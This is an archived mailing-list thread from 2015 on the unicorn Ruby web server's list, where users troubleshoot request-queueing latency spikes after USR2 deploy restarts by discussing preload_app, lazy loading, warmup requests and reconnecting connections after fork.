> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:28  0%                     ` Sarkis Varozian
@ 2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:31 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

I would try to reproduce this locally with a production env and `ab -n 200
-c 2 http://localhost:3000/`



On Thu, Mar 5, 2015 at 2:28 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Braulio,
>
> Are you referring to the vertical grey line? That is the deployment event.
> The part that spikes in the first graph is request queue which is a bit
> different on newrelic:
> http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/
>
> We are using HAProxy to load balance (round robin) to 4 physical hosts
> running unicorn with 6 workers.
>
> I have not tried to reproduce this on 1 master - I assume this would be
> the same.
>
> I do in fact do the sleep now:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
> the deployment results above had the 1 second sleep in there.
>
> On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
> wrote:
>
>> In the graphs you posted, what is the grey part? It is not described in
>> the legend and it seems the problem is entirely there. What reverse proxy
>> are you using?
>>
>> Can you reproduce this with a single master instance?
>>
>> Could you try this sleep:
>> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>>
>>
>> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Hey All,
>>>
>>> So I changed up my unicorn.rb a bit from my original post:
>>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>>
>>> I'm also still sending the USR2 signals on deploy staggered with 30
>>> second delay via capistrano:
>>>
>>> on roles(:web), in: :sequence, wait: 30
>>>
>>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>>> would warmup the master). However, this is what a deploy looks like on
>>> newrelic:
>>>
>>>
>>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>>
>>>
>>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>>
>>> I'm running out of ideas to get rid of thse latency spikes. Would you
>>> guys recommend I try anything else at this point?
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Eric,
>>>>
>>>> Thanks for the quick reply.
>>>>
>>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is
>>>> the lazy loading - at least thats what all signs point to. I am going to
>>>> try and mock request some url endpoints. Currently, I can only think of
>>>> '/', as most other parts of the app require a session and auth. I'll report
>>>> back with results.
>>>>
>>>>
>>>>
>>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>>
>>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>>> mfischer@zendesk.com>
>>>>> > wrote:
>>>>> >
>>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>>> is
>>>>> > > lazy-loading a number of Ruby libraries while handling the first
>>>>> few
>>>>> > > requests that weren't automatically loaded during the preload
>>>>> process.
>>>>> > >
>>>>> > > Eric, your thoughts?
>>>>>
>>>>> (top-posting corrected)
>>>>>
>>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>>> autoloaded.
>>>>>
>>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>>> 1.9.2
>>>>>
>>>>> > That does make sense - I was looking at another suggestion from a
>>>>> user here
>>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>>> >
>>>>> > The only issue I am having with the above solution is it is
>>>>> happening in
>>>>> > the before_fork block - shouldn't I warmup the connection in
>>>>> after_fork?
>>>>>
>>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>>> needs to be after_fork.
>>>>>
>>>>> > If
>>>>> > I follow the above gist properly it warms up the server with the old
>>>>> > activerecord base connection and then its turned off, then turned
>>>>> back on
>>>>> > in after_fork. I think I am not understanding the sequence of events
>>>>> > there...
>>>>>
>>>>> With preload_app and warmup, you need to ensure any stream connections
>>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>>> child.
>>>>>
>>>>> > If this is the case, I should warmup and also check/kill the old
>>>>> > master in the after_fork block after the new db, redis, neo4j
>>>>> connections
>>>>> > are all created. Thoughts?
>>>>>
>>>>> I've been leaving killing the master outside of the unicorn hooks
>>>>> and doing it as a separate step; seemed too fragile to do it in
>>>>> hooks from my perspective.
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
>> ideologia. Morra por sua ideologia" P.R. Sarkar
>>
>> EITA - Educação, Informação e Tecnologias para Autogestão
>> http://cirandas.net/brauliobo
>> http://eita.org.br
>>
>> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
>> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
>> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
>> destruídas nas fases de extroversão e introversão do fluxo imaginativo
>> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
>> naquele momento, essa pessoa é a única proprietária daquilo que ela
>> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
>> por um milharal também imaginado, a pessoa imaginada não é a propriedade
>> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
>> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
>> a propriedade deste universo é de Brahma, e não dos microcosmos que também
>> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
>> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
>> patrimônio comum de todos."
>> Restante do texto em
>> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
@ 2015-03-05 17:28  0%                     ` Sarkis Varozian
  2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
  2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:28 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: Eric Wong, Michael Fischer, unicorn-public

Braulio,

Are you referring to the vertical grey line? That is the deployment event.
The part that spikes in the first graph is request queue which is a bit
different on newrelic:
http://blog.newrelic.com/2013/01/22/understanding-new-relic-queuing/

We are using HAProxy to load balance (round robin) to 4 physical hosts
running unicorn with 6 workers.

I have not tried to reproduce this on 1 master - I assume this would be the
same.

I do in fact do the sleep now:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab#file-unicorn-rb-L37 -
the deployment results above had the 1 second sleep in there.

On Thu, Mar 5, 2015 at 9:13 AM, Bráulio Bhavamitra <braulio@eita.org.br>
wrote:

> In the graphs you posted, what is the grey part? It is not described in
> the legend and it seems the problem is entirely there. What reverse proxy
> are you using?
>
> Can you reproduce this with a single master instance?
>
> Could you try this sleep:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91
>
>
> On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Hey All,
>>
>> So I changed up my unicorn.rb a bit from my original post:
>> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>>
>> I'm also still sending the USR2 signals on deploy staggered with 30
>> second delay via capistrano:
>>
>> on roles(:web), in: :sequence, wait: 30
>>
>> As you can see I am now doing a warup via rack MockRequest (I hoped this
>> would warmup the master). However, this is what a deploy looks like on
>> newrelic:
>>
>>
>> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>>
>>
>> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>>
>> I'm running out of ideas to get rid of thse latency spikes. Would you
>> guys recommend I try anything else at this point?
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Eric,
>>>
>>> Thanks for the quick reply.
>>>
>>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>>> lazy loading - at least thats what all signs point to. I am going to try
>>> and mock request some url endpoints. Currently, I can only think of '/', as
>>> most other parts of the app require a session and auth. I'll report back
>>> with results.
>>>
>>>
>>>
>>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>>
>>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <
>>>> mfischer@zendesk.com>
>>>> > wrote:
>>>> >
>>>> > > I'm not exactly sure how preload_app works, but I suspect your app
>>>> is
>>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>>> > > requests that weren't automatically loaded during the preload
>>>> process.
>>>> > >
>>>> > > Eric, your thoughts?
>>>>
>>>> (top-posting corrected)
>>>>
>>>> Yeah, preload_app won't help startup speed if much of the app is
>>>> autoloaded.
>>>>
>>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>>> 1.9.2
>>>>
>>>> > That does make sense - I was looking at another suggestion from a
>>>> user here
>>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>>> >
>>>> > The only issue I am having with the above solution is it is happening
>>>> in
>>>> > the before_fork block - shouldn't I warmup the connection in
>>>> after_fork?
>>>>
>>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>>> needs to be after_fork.
>>>>
>>>> > If
>>>> > I follow the above gist properly it warms up the server with the old
>>>> > activerecord base connection and then its turned off, then turned
>>>> back on
>>>> > in after_fork. I think I am not understanding the sequence of events
>>>> > there...
>>>>
>>>> With preload_app and warmup, you need to ensure any stream connections
>>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>>> it's standard practice to disconnect in the parent and reconnect in the
>>>> child.
>>>>
>>>> > If this is the case, I should warmup and also check/kill the old
>>>> > master in the after_fork block after the new db, redis, neo4j
>>>> connections
>>>> > are all created. Thoughts?
>>>>
>>>> I've been leaving killing the master outside of the unicorn hooks
>>>> and doing it as a separate step; seemed too fragile to do it in
>>>> hooks from my perspective.
>>>>
>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
> --
> "Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
> ideologia. Morra por sua ideologia" P.R. Sarkar
>
> EITA - Educação, Informação e Tecnologias para Autogestão
> http://cirandas.net/brauliobo
> http://eita.org.br
>
> "Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
> lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
> Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
> destruídas nas fases de extroversão e introversão do fluxo imaginativo
> cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
> naquele momento, essa pessoa é a única proprietária daquilo que ela
> imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
> por um milharal também imaginado, a pessoa imaginada não é a propriedade
> desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
> universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
> a propriedade deste universo é de Brahma, e não dos microcosmos que também
> foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
> mutável ou imutável, pertence a um indivíduo em particular; tudo é o
> patrimônio comum de todos."
> Restante do texto em
> http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-05 17:07  0%                 ` Sarkis Varozian
@ 2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
  2015-03-05 17:28  0%                     ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Bráulio Bhavamitra @ 2015-03-05 17:13 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: Eric Wong, Michael Fischer, unicorn-public

In the graphs you posted, what is the grey part? It is not described in the
legend and it seems the problem is entirely there. What reverse proxy are
you using?

Can you reproduce this with a single master instance?

Could you try this sleep:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L91


On Thu, Mar 5, 2015 at 2:07 PM, Sarkis Varozian <svarozian@gmail.com> wrote:

> Hey All,
>
> So I changed up my unicorn.rb a bit from my original post:
> https://gist.github.com/sarkis/1aa296044b1dfd3695ab
>
> I'm also still sending the USR2 signals on deploy staggered with 30 second
> delay via capistrano:
>
> on roles(:web), in: :sequence, wait: 30
>
> As you can see I am now doing a warup via rack MockRequest (I hoped this
> would warmup the master). However, this is what a deploy looks like on
> newrelic:
>
>
> https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0
>
>
> https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0
>
> I'm running out of ideas to get rid of thse latency spikes. Would you guys
> recommend I try anything else at this point?
>
>
>
> On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Eric,
>>
>> Thanks for the quick reply.
>>
>> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
>> lazy loading - at least thats what all signs point to. I am going to try
>> and mock request some url endpoints. Currently, I can only think of '/', as
>> most other parts of the app require a session and auth. I'll report back
>> with results.
>>
>>
>>
>> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>>
>>> Sarkis Varozian <svarozian@gmail.com> wrote:
>>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com
>>> >
>>> > wrote:
>>> >
>>> > > I'm not exactly sure how preload_app works, but I suspect your app is
>>> > > lazy-loading a number of Ruby libraries while handling the first few
>>> > > requests that weren't automatically loaded during the preload
>>> process.
>>> > >
>>> > > Eric, your thoughts?
>>>
>>> (top-posting corrected)
>>>
>>> Yeah, preload_app won't help startup speed if much of the app is
>>> autoloaded.
>>>
>>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>>> startup performance compared to 1.9.3 and later in case you're stuck on
>>> 1.9.2
>>>
>>> > That does make sense - I was looking at another suggestion from a user
>>> here
>>> > (Braulio) of running a "warmup" using rack MockRequest:
>>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>>> >
>>> > The only issue I am having with the above solution is it is happening
>>> in
>>> > the before_fork block - shouldn't I warmup the connection in
>>> after_fork?
>>>
>>> If preload_app is true, you can warmup in before_fork; otherwise it
>>> needs to be after_fork.
>>>
>>> > If
>>> > I follow the above gist properly it warms up the server with the old
>>> > activerecord base connection and then its turned off, then turned back
>>> on
>>> > in after_fork. I think I am not understanding the sequence of events
>>> > there...
>>>
>>> With preload_app and warmup, you need to ensure any stream connections
>>> (DB, memcached, redis, etc..) do not get shared between processes, so
>>> it's standard practice to disconnect in the parent and reconnect in the
>>> child.
>>>
>>> > If this is the case, I should warmup and also check/kill the old
>>> > master in the after_fork block after the new db, redis, neo4j
>>> connections
>>> > are all created. Thoughts?
>>>
>>> I've been leaving killing the master outside of the unicorn hooks
>>> and doing it as a separate step; seemed too fragile to do it in
>>> hooks from my perspective.
>>>
>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é meu
lar e todos nós somos cidadãos deste cosmo. Este universo é a imaginação da
Mente Macrocósmica, e todas as entidades estão sendo criadas, preservadas e
destruídas nas fases de extroversão e introversão do fluxo imaginativo
cósmico. No âmbito pessoal, quando uma pessoa imagina algo em sua mente,
naquele momento, essa pessoa é a única proprietária daquilo que ela
imagina, e ninguém mais. Quando um ser humano criado mentalmente caminha
por um milharal também imaginado, a pessoa imaginada não é a propriedade
desse milharal, pois ele pertence ao indivíduo que o está imaginando. Este
universo foi criado na imaginação de Brahma, a Entidade Suprema, por isso
a propriedade deste universo é de Brahma, e não dos microcosmos que também
foram criados pela imaginação de Brahma. Nenhuma propriedade deste mundo,
mutável ou imutável, pertence a um indivíduo em particular; tudo é o
patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:40  0%               ` Sarkis Varozian
@ 2015-03-05 17:07  0%                 ` Sarkis Varozian
  2015-03-05 17:13  0%                   ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-05 17:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, unicorn-public, Bráulio Bhavamitra

Hey All,

So I changed up my unicorn.rb a bit from my original post:
https://gist.github.com/sarkis/1aa296044b1dfd3695ab

I'm also still sending the USR2 signals on deploy staggered with 30 second
delay via capistrano:

on roles(:web), in: :sequence, wait: 30

As you can see I am now doing a warup via rack MockRequest (I hoped this
would warmup the master). However, this is what a deploy looks like on
newrelic:

https://www.dropbox.com/s/beh7nc8npdfijqp/Screenshot%202015-03-05%2009.05.15.png?dl=0

https://www.dropbox.com/s/w08gpvp7mpik3vs/Screenshot%202015-03-05%2009.06.51.png?dl=0

I'm running out of ideas to get rid of thse latency spikes. Would you guys
recommend I try anything else at this point?



On Wed, Mar 4, 2015 at 12:40 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> Eric,
>
> Thanks for the quick reply.
>
> We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
> lazy loading - at least thats what all signs point to. I am going to try
> and mock request some url endpoints. Currently, I can only think of '/', as
> most other parts of the app require a session and auth. I'll report back
> with results.
>
>
>
> On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:
>
>> Sarkis Varozian <svarozian@gmail.com> wrote:
>> > On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
>> > wrote:
>> >
>> > > I'm not exactly sure how preload_app works, but I suspect your app is
>> > > lazy-loading a number of Ruby libraries while handling the first few
>> > > requests that weren't automatically loaded during the preload process.
>> > >
>> > > Eric, your thoughts?
>>
>> (top-posting corrected)
>>
>> Yeah, preload_app won't help startup speed if much of the app is
>> autoloaded.
>>
>> Sarkis: which Ruby version are you running?  IIRC, 1.9.2 had terrible
>> startup performance compared to 1.9.3 and later in case you're stuck on
>> 1.9.2
>>
>> > That does make sense - I was looking at another suggestion from a user
>> here
>> > (Braulio) of running a "warmup" using rack MockRequest:
>> > https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>> >
>> > The only issue I am having with the above solution is it is happening in
>> > the before_fork block - shouldn't I warmup the connection in after_fork?
>>
>> If preload_app is true, you can warmup in before_fork; otherwise it
>> needs to be after_fork.
>>
>> > If
>> > I follow the above gist properly it warms up the server with the old
>> > activerecord base connection and then its turned off, then turned back
>> on
>> > in after_fork. I think I am not understanding the sequence of events
>> > there...
>>
>> With preload_app and warmup, you need to ensure any stream connections
>> (DB, memcached, redis, etc..) do not get shared between processes, so
>> it's standard practice to disconnect in the parent and reconnect in the
>> child.
>>
>> > If this is the case, I should warmup and also check/kill the old
>> > master in the after_fork block after the new db, redis, neo4j
>> connections
>> > are all created. Thoughts?
>>
>> I've been leaving killing the master outside of the unicorn hooks
>> and doing it as a separate step; seemed too fragile to do it in
>> hooks from my perspective.
>>
>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>



-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:35  0%             ` Eric Wong
@ 2015-03-04 20:40  0%               ` Sarkis Varozian
  2015-03-05 17:07  0%                 ` Sarkis Varozian
  0 siblings, 1 reply; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:40 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, unicorn-public

Eric,

Thanks for the quick reply.

We are on Ruby 2.1.5p273 and unicorn 4.8.3. I believe our problem is the
lazy loading - at least thats what all signs point to. I am going to try
and mock request some url endpoints. Currently, I can only think of '/', as
most other parts of the app require a session and auth. I'll report back
with results.



On Wed, Mar 4, 2015 at 12:35 PM, Eric Wong <e@80x24.org> wrote:

> Sarkis Varozian <svarozian@gmail.com> wrote:
